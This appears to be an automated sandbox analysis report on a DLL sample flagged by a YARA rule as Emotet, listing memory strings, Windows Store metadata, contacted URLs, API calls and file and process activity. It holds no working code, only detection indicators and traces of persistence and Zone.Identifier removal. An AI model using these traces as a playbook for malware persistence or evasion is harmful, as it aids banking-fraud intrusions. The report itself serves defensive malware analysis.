Source: svchost.exe, 00000013.00000003.795815755.000001691B392000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
Source: svchost.exe, 00000013.00000003.795852774.000001691B3A3000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.795815755.000001691B392000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000013.00000003.795852774.000001691B3A3000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.795815755.000001691B392000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000013.00000003.798134936.000001691B390000.00000004.00000001.sdmp	String found in binary or memory: -free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN",8 equals www.facebook.com (Facebook)
Source: svchost.exe, 00000013.00000003.798134936.000001691B390000.00000004.00000001.sdmp	String found in binary or memory: -free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN",8 equals www.twitter.com (Twitter)
Source: svchost.exe, 00000013.00000003.796149419.000001691B339000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.796058147.000001691B338000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.795994776.000001691B338000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.796118878.000001691B33A000.00000004.00000001.sdmp	String found in binary or memory: hed\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"sys
Source: svchost.exe, 00000013.00000003.796149419.000001691B339000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.796058147.000001691B338000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.795994776.000001691B338000.00000004.00000001.sdmp, svchost.exe, 00000013.00000003.796118878.000001691B33A000.00000004.00000001.sdmp	String found in binary or memory: hed\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"level\":81,\"sys

Source: svchost.exe, 00000013.00000002.815236727.000001691AAF1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.13.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000013.00000003.790022844.000001691B39D000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: Amcache.hve.11.dr	String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 00000013.00000003.790022844.000001691B39D000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000013.00000003.790022844.000001691B39D000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000013.00000003.790022844.000001691B39D000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000013.00000003.791410747.000001691B390000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10001280 recvfrom,

2_2_10001280

Source: loaddll32.exe, 00000000.00000002.703211400.000000000089B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10027958 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		2_2_10027958
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10027958 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		3_2_10027958

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 4.2.rundll32.exe.4430000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5610000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.50f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5250000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5250000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4bb0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.860000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.820000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.31c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.52e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5280000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.37e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4940000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5120000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.42e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.50f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b20000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b50000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2f10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.42e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b80000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.820000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4a40000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b80000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4a70000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4fb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4910000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4ac0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.860000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5640000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5610000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4910000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.52b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4a40000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4fb0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.31c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.52b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.e40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.860000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.669073242.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685263921.0000000005281000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.684322708.00000000031C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.684701271.0000000004AC1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.688210118.00000000037E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719107308.0000000004941000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.669823060.0000000004480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.677964446.0000000000820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685292012.00000000052B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.676011964.0000000000820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685429920.0000000005641000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719259656.0000000004B51000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685397124.0000000005610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.669847564.00000000044B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685144979.0000000005121000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685224843.0000000005250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685049749.0000000005001000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719178137.0000000004A71000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.687920491.0000000003520000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719295807.0000000004B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685326019.00000000052E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.684986586.0000000004FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.678063941.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.669249846.0000000002F11000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.702950192.0000000000820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.685112085.00000000050F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719142845.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719325918.0000000004BB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719229913.0000000004B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.718771472.00000000042E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.719080684.0000000004910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.676117547.0000000000861000.00000020.00000001.sdmp, type: MEMORY

System Summary:

Source: hPJnda9rBy.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6532 -ip 6532

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Knpnqswfpazuozi\koewoajrwakr.ckb:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Nqsihdpwvadvq\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087EFDD	0_2_0087EFDD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0087A2A5	0_2_0087A2A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_008836AA	0_2_008836AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00861CA1	0_2_00861CA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00873EAA	0_2_00873EAA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0086BAA9	0_2_0086BAA9
